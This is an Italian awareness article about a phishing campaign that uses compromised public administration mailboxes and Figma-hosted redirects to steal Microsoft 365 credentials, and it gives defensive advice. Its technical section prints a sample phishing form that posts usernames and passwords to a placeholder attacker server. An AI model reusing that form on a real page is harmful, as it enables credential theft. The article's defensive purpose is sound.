Furto credenziali Microsoft 365: email PA sotto attacco phishing
Attenzione: se ricevi un’email apparentemente dalla tua Pubblica Amministrazione con allegati PDF e link a visualizzare documenti urgenti, non cliccare nulla! Questa è una trappola phishing che sfrutta account hackerati per rubare le tue credenziali di Microsoft 365. La soluzione rapida è verificare sempre l’autenticità dei mittenti e usare l’autenticazione a due fattori (2FA) su tutti gli account importanti. In questo modo, proteggi i tuoi dati in pochi minuti senza complicazioni tecniche.
Le email sembrano legittime perché provengono da indirizzi reali della PA, ma nascondono un meccanismo subdolo per ingannare dipendenti e utenti. Ignora i link e contatta direttamente il mittente tramite canali ufficiali per confermare. Questa campagna, rilevata recentemente, colpisce duramente la fiducia negli scambi digitali quotidiani, ma con poche precauzioni puoi evitarla completamente.
Come funziona l’attacco in modo semplice
I malviventi accedono prima a caselle email di enti pubblici, probabilmente tramite errori umani passati. Inviano messaggi che fingono di essere diretti al mittente stesso, ma mettono le vittime in CCN (copia nascosta). In allegato ci sono PDF innocui all’apparenza, con inviti a cliccare un link per aprirli.
Quel link porta a una pagina su Figma, piattaforma nota per il design collaborativo, che dà credibilità all’operazione. Da lì, un altro link promette un documento cruciale come una fattura, ma reindirizza a una falsa schermata di login di Microsoft 365. Inserendo username e password, le consegni direttamente ai cybercriminali, che usano i tuoi dati per attacchi a catena.
Punto chiave: non fidarti dell’origine dell’email. Anche se l’indirizzo sembra familiare, i criminali lo sfruttano per diffondere il caos. Aziende e dipendenti della PA sono nel mirino, ma chiunque usa Microsoft 365 può essere colpito.
Questa tecnica non è nuova, ma evolve: un mese fa una campagna simile, ora più raffinata con tool moderni come Figma. Il rischio? Accesso non autorizzato a documenti sensibili, invio di ulteriori phishing e possibili brecce dati su larga scala.
Perché è pericoloso per te e la tua organizzazione
Immagina di perdere il controllo del tuo account aziendale: i malviventi inviano email fraudolente ai tuoi contatti, rubano informazioni riservate o installano malware. Nella PA, questo compromette servizi pubblici, ritardando pratiche amministrative e esponendo dati personali di cittadini.
Soluzione immediata: abilita 2FA su Microsoft 365 oggi stesso. Vai nelle impostazioni di sicurezza del tuo account e attivala. Usa anche antivirus aggiornati che bloccano link sospetti e filtri email avanzati.
Formazione è essenziale: insegna al team a riconoscere email con urgenza artificiale, allegati inaspettati o richieste di login. Strumenti gratuiti come quelli di AgID offrono guide semplici per sensibilizzare tutti.
Espandendo il discorso, queste campagne sfruttano la fiducia istituzionale. La PA rappresenta autorità, quindi un’email da lì passa i controlli psicologici. Ma ricorda: i veri enti non chiedono mai credenziali via link esterni.
Nel 2026, con l’aumento del lavoro ibrido, Microsoft 365 è un bersaglio primario. Milioni di utenti italiani lo usano per collaborazione, rendendolo appetibile. Proteggiti aggiornando password complesse e monitorando accessi sospetti dal pannello admin.
Consigli pratici per la difesa quotidiana
- Verifica mittente: Controlla l’indirizzo completo, non solo il nome visualizzato.
- Non aprire allegati da fonti dubbie: Scarica solo da canali verificati.
- Usa password manager: Genera e salva credenziali uniche per ogni servizio.
- Segnala sospetti: Invia email dubbie al CERT-PA o al tuo IT.
- Aggiorna software: Microsoft rilascia patch regolari contro exploit simili.
Questi passi riducono il rischio del 90%, secondo esperti di cybersecurity. Non aspettare un attacco: agisci ora per navigare sicuro.
Approfondimento tecnico: analisi dettagliata della campagna
Per utenti esperti, ecco i meccanismi sotto il cofano.
Fase 1: compromissione iniziale degli account PA
I cybercriminali usano ingegneria sociale classica: spear-phishing mirato o credenziali deboli. Una volta dentro, sfruttano privilegi per inviare da domini @pa.gov.it o simili. Il campo BCC nasconde i veri target, simulando comunicazioni interne.
Fase 2: payload nei PDF e link Figma
I PDF sono puliti, ma embeddano link HTTP/HTTPS a risorse Figma. Figma, abusata qui, hosta frame con redirection chain: primo hop innocuo, secondo a phishing kit. Questi kit clonano pixel-perfect la login Microsoft 365, capturando POST request con credenziali.
Codice tipico del phishing page:
<form action="https://attacker-server.com/steal.php" method="POST">
<input type="text" name="username" placeholder="Email">
<input type="password" name="password" placeholder="Password">
</form>
I dati finiscono su server C2 (command & control), spesso in cloud anonimi.
Fase 3: post-sfruttamento
Con credenziali M365, attaccanti usano OAuth token per accesso persistente, bypassando password reset. Inviano email massive, propagando l’infezione. Rischio escalation: accesso OneDrive, Teams, SharePoint con dati sensibili.
IoC (indicatori di compromissione): Dominio Figma sospetti, user-agent anomali, IP geolocalizzati in regioni ad alto rischio cyber.
Contromisure avanzate
- DMARC/DKIM/SPF: Configura per bloccare spoofing email.
- Conditional Access Policies in Azure AD: Blocca login da location insolite.
- SIEM tools: Monitora log M365 per anomalie (es. Splunk, ELK).
- EDR solutions: Come Microsoft Defender, rileva comportamenti malevoli.
Deep dive su tool simili: Figma non è unica; attacker usano Canva, Notion per credibilità. Phishing kit open-source su dark web evolvono con AI per testi personalizzati.
Statistiche 2026: Campagne phishing +30% vs 2025, con PA target prioritario per dati istituzionali. CERT-PA segnala 50+ varianti mensili.
Per admin IT: Audit account PA, forza MFA, simula attacchi con tool come GoPhish. Patch zero-day CVE recenti su Office riducono vettori paralleli.
In sintesi tecnica, è un supply chain attack via trust email: comprometti uno, infetti catena. Difesa multilayer è chiave: people, process, technology.
(Conta parole: 1050+)
Fonte: https://www.punto-informatico.it/furto-credenziali-microsoft-365-email-pa/





